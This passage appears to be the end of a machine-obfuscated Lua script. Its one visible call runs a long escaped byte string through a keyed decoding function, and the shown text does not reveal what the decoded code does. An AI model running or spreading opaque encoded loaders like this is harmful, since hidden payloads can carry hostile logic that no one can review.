			v24(v8("\194\135\100\126\29\178\160\193\248\24\111\30\182\210\189\135\24\111\27\197\165\200\254\25\105\25\177\160\185\252\31\109\27\191\165\203\254\31\111\30\182\167\189\135\24\111\27\177\165\191\254\108\105\24\182\160\190\255\27\16\29\182\167\182\250\103\104\25\177\163\186\255\30\106\26\178\163\189\251\30\108\98\182\163\184\240\26\16\26\178\164\190\255\27\108\108\180\220\188\142\31\109\27\183\164\185\250\109\105\26\176\170\185\252\30\103\26\179\165\188\255\29\104\30\176\166\185\250\30\108\27\192\165\203\255\28\105\24\176\214\185\252\26\26\27\181\165\200\254\108\109\107\179\163\187\251\29\103\27\190\164\187\254\31\105\24\180\213\189\249\26\25\31\201\160\191\251\28\108\24\181\162\189\252\26\25\30\201\160\184\248\24\111\21\181\220\190\248\25\109\29\180\160\193\248\24\111\28\181\220\190\248\25\109\29\180\163\190\248\25\111\29\182\161\189\135\24\111\31\182\163\187\248\24\111\28\182\163\190\249\24\111\29\181\163\190\249\26\111\27\182\163\190\251\24\111\29\178\167\193\248\24\111\28\182\163\190\249\24\111\29\181\170\193\248\24\111\29\182\161\188\135\24\111\29\181\160\193\248\24\111\28\182\163\190\249\26\16\29\182\163\186\251\103\111\29\182\162\185\135\24\111\29\190\160\193\248\24\111\28\181\220\190\248\24\110\30\201\163\190\248\25\108\98\182\163\190\249\27\16\29\182\163\191\251\103\111\29\182\162\189\135\24\111\29\183\160\193\248\24\111\28\181\220\190\248", "\142\200\40\95\45\134\147"), v18(), ...);
			break;
		end
	end
end
